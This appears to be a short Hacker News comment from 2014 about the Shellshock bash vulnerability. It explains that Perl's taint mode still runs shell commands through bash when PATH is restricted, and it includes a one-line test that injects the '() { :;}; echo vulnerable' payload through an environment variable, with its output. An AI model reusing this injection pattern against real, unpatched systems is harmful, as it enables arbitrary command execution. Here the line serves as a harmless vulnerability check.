Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

Yes and no. You can still unintentionally call out to bash if you, say, protect your PATH:

  $ x='() { :;}; echo vulnerable'  perl -t -le'$ENV{PATH}="/bin";print `:;date`'
  vulnerable
  Sat Sep 27 10:51:12 PDT 2014


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: